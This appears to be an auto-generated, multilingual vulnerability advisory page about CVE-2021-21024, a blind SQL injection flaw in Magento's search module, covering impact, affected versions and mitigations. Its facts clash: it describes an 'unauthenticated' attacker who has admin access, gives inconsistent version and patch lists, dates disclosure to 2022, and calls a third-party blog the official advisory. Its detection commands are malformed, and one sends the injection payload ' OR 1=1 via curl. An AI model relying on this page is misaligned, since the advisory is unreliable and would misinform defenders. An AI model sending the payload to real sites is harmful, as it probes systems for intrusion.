平台
php
组件
magento/community-edition
修复版本
2.4.2
2.4.1
2.3.7
2.3.6-p1
CVE-2021-21024 describes a blind SQL injection vulnerability discovered in the Magento Community Edition Search module. Successful exploitation allows an unauthenticated attacker with admin console access to potentially access restricted resources. This vulnerability impacts versions 2.4.1 and earlier, 2.4.0-p1 and earlier, and 2.3.6 and earlier. A patch is available in version 2.3.6-p1.
The SQL injection vulnerability in Magento's Search module poses a significant risk. An attacker, possessing administrative access, can craft malicious queries to extract sensitive data directly from the database. This could include customer Personally Identifiable Information (PII) such as names, addresses, credit card details (if stored), order history, and potentially even administrative credentials. Beyond data exfiltration, the attacker could manipulate data, leading to fraudulent orders, account takeovers, or denial of service. The blind nature of the injection means the attacker doesn't directly see the results of their queries, requiring more sophisticated techniques to extract information, but doesn't inherently limit the potential impact. This vulnerability shares characteristics with other database injection flaws, highlighting the importance of parameterized queries and input validation.
CVE-2021-21024 was publicly disclosed on May 24, 2022. While no active exploitation campaigns have been definitively confirmed, the vulnerability's critical severity and ease of exploitation make it a likely target. It is not currently listed on the CISA KEV catalog. Public proof-of-concept exploits are available, increasing the risk of opportunistic attacks.
Organizations running Magento Community Edition versions 2.3.6 and earlier, particularly those with publicly accessible admin consoles and inadequate security measures, are at significant risk. Shared hosting environments utilizing Magento are also vulnerable, as they may lack control over the underlying server configuration and patching process.
• php / server:
find /var/www/html -name 'app/code/Magento/Search/Model/Adapter/Mysql.php' -exec grep -i 'query(' {} + | grep -i 'SELECT' • php / server:
journalctl -u php-fpm -f | grep -i "SQL injection"• generic web:
curl -I https://your-magento-site.com/search?q=' OR 1=1 --silent | grep -i '200 OK'discovery
disclosure
patch
漏洞利用状态
EPSS
2.07% (84% 百分位)
CVSS 向量
The primary mitigation for CVE-2021-21024 is to immediately upgrade to Magento Community Edition version 2.3.6-p1 or later. If upgrading is not immediately feasible, consider implementing temporary workarounds. Restrict access to the admin console using strong passwords and multi-factor authentication. Implement a Web Application Firewall (WAF) with rules to detect and block SQL injection attempts targeting the Search module endpoints. Carefully review and validate all user inputs related to search functionality. Monitor Magento logs for suspicious activity, specifically looking for unusual database queries originating from the Search module. After upgrading, confirm the vulnerability is resolved by attempting a test SQL injection payload against the Search module and verifying that it is properly sanitized.
Actualice Magento Commerce a la última versión disponible. Consulte el aviso de seguridad de Adobe para obtener más detalles e instrucciones específicas sobre la actualización.
漏洞分析和关键警报直接发送到您的邮箱。
CVE-2021-21024 is a critical SQL injection vulnerability affecting Magento Community Edition versions up to 2.3.6, allowing unauthorized access with admin privileges.
You are affected if you are running Magento Community Edition versions 2.4.1 and earlier, 2.4.0-p1 and earlier, or 2.3.6 and earlier. Check your version and upgrade immediately.
Upgrade to Magento Community Edition version 2.3.6-p1 or later. Implement WAF rules and restrict admin console access as temporary mitigations.
While no confirmed active campaigns are publicly known, the vulnerability's severity and available PoCs make it a likely target for exploitation.
Refer to the official Magento security advisory at https://dev.classmethod.com/en/2021/12/16/magento-2-4-1-security-vulnerability-sql-injection/